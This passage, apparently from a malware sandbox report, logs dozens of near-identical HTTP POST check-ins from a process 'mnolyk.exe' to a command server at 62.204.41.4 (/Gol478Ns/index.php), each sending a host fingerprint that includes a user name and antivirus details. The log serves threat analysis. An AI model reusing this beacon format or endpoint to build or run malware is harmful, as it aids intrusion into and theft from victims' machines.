                            Feb 8, 2023 17:38:59.675888062 CET | 508 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.741914988 CET | 508 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            32 | 192.168.2.4 | 49727 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:34.234314919 CET | 221 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:34.300367117 CET | 221 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            320 | 192.168.2.4 | 50015 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:59.919528961 CET | 509 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.986246109 CET | 509 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            321 | 192.168.2.4 | 50016 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:00.164304972 CET | 510 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.230684042 CET | 510 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            322 | 192.168.2.4 | 50017 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:00.402673006 CET | 511 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.467941046 CET | 511 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            323 | 192.168.2.4 | 50018 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:00.633702993 CET | 512 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.697846889 CET | 512 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            324 | 192.168.2.4 | 50019 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:00.869716883 CET | 513 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.937946081 CET | 513 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            325 | 192.168.2.4 | 50020 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:01.119659901 CET | 514 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.187212944 CET | 514 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            326 | 192.168.2.4 | 50021 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:01.371725082 CET | 515 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.439729929 CET | 515 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            327 | 192.168.2.4 | 50022 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:01.616779089 CET | 516 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.680536985 CET | 516 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            328 | 192.168.2.4 | 50023 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:01.855210066 CET | 517 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:01.922120094 CET | 517 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            329 | 192.168.2.4 | 50024 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:02.100310087 CET | 518 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.164222002 CET | 518 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            33 | 192.168.2.4 | 49728 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:34.522764921 CET | 222 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:34.586766005 CET | 222 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            330 | 192.168.2.4 | 50025 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:02.337619066 CET | 519 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.402637005 CET | 519 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            331 | 192.168.2.4 | 50026 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:02.587069988 CET | 520 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.651599884 CET | 520 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            332 | 192.168.2.4 | 50027 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:02.823441982 CET | 521 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:02.889178991 CET | 521 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            333 | 192.168.2.4 | 50028 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:03.062794924 CET | 522 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.128715992 CET | 522 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            334 | 192.168.2.4 | 50029 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:03.307262897 CET | 523 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.371998072 CET | 523 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            335 | 192.168.2.4 | 50030 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:03.558067083 CET | 524 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.626437902 CET | 524 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            336 | 192.168.2.4 | 50031 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:03.810410023 CET | 525 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:03.875169992 CET | 525 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            337 | 192.168.2.4 | 50032 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:04.057615995 CET | 526 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
